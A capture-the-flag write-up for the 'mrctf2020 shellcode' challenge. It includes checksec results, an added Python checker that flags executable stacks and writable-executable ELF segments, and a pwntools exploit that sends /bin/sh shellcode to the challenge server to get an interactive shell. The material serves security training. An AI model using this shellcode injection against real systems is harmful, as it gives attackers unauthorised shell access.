# mrctf2020 shellcode
# Prerequisites
# Checking the binary's protections
```
[*] '/root/pwn/buuctf/mrctf2020_shellcode/mrctf2020_shellcode'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
```
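# Analysis
What we know so far:
- Full RELRO
- No canary found
- NX disabled
- PIE enabled
- Has RWX segments

Approach:
- The binary has a segment that is readable, writable and executable, so, following the program flow in the figure above, we can write the shellcode in directly.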
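
The `NX disabled` and `Has RWX segments` findings listed above are read from the ELF program headers, and the same check can gate a build before a binary ships. The following is an added example, not part of the original writeup: it parses little-endian ELF64 program headers and reports an executable stack and any writable-and-executable segment. The names `audit_segments` and `build_sample` and both sample images are constructed for illustration.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # ELF64 file header (64 bytes)
PHDR = struct.Struct("<IIQQQQQQ")          # ELF64 program header (56 bytes)


def audit_segments(image: bytes) -> dict:
    """Report executable-stack and writable+executable segments of an ELF64 LE image."""
    if len(image) < EHDR.size:
        raise ValueError("truncated ELF header")
    hdr = EHDR.unpack_from(image)
    ident, phoff, phentsize, phnum = hdr[0], hdr[5], hdr[9], hdr[10]
    if ident[:4] != b"\x7fELF" or ident[4] != 2 or ident[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    if phentsize != PHDR.size or phoff + phnum * phentsize > len(image):
        raise ValueError("program header table is malformed or truncated")
    exec_stack, wx = None, []  # None: no PT_GNU_STACK header, the loader's default applies
    for i in range(phnum):
        p_type, p_flags, _off, vaddr, *_rest = PHDR.unpack_from(image, phoff + i * phentsize)
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)
        if (p_flags & (PF_W | PF_X)) == (PF_W | PF_X):
            wx.append((p_type, vaddr))
    return {"exec_stack": exec_stack, "wx_segments": wx}


def build_sample(phdrs) -> bytes:
    """Constructed test input: an ELF64 header plus (type, flags, vaddr) program headers."""
    ident = b"\x7fELF\x02\x01\x01" + bytes(9)
    ehdr = EHDR.pack(ident, 3, 62, 1, 0, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, len(phdrs), 0, 0, 0)
    return ehdr + b"".join(PHDR.pack(t, f, 0, v, v, 0, 0, 0x1000) for t, f, v in phdrs)


# Constructed samples, not the challenge binary: one with the findings above, one hardened.
WEAK = build_sample([(PT_LOAD, PF_R | PF_W | PF_X, 0x1000),
                     (PT_GNU_STACK, PF_R | PF_W | PF_X, 0)])
HARDENED = build_sample([(PT_LOAD, PF_R | PF_X, 0x1000),
                         (PT_LOAD, PF_R | PF_W, 0x3000),
                         (PT_GNU_STACK, PF_R | PF_W, 0)])

if __name__ == "__main__":
    for name, image in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_segments(image))
```

A release check can fail the build when `exec_stack` is `True` or `wx_segments` is non-empty; pass the bytes of a real file to `audit_segments` to apply it outside the constructed samples.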
# exp
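```python
from pwn import *

# Terminal used if a debugger window is opened
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')

pwnfile = '/root/pwn/buuctf/mrctf2020_shellcode/mrctf2020_shellcode'
io = remote('node4.buuoj.cn', 27771)
# io = process(pwnfile)  # run against the local binary instead
elf = ELF(pwnfile)

# amd64 /bin/sh shellcode generated by pwntools
shellcode = asm(shellcraft.sh())

io.recv()               # read the program's initial output
io.sendline(shellcode)  # send the shellcode as the program's input
io.interactive()
```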
Last updated: 2022/08/15, 00:29:49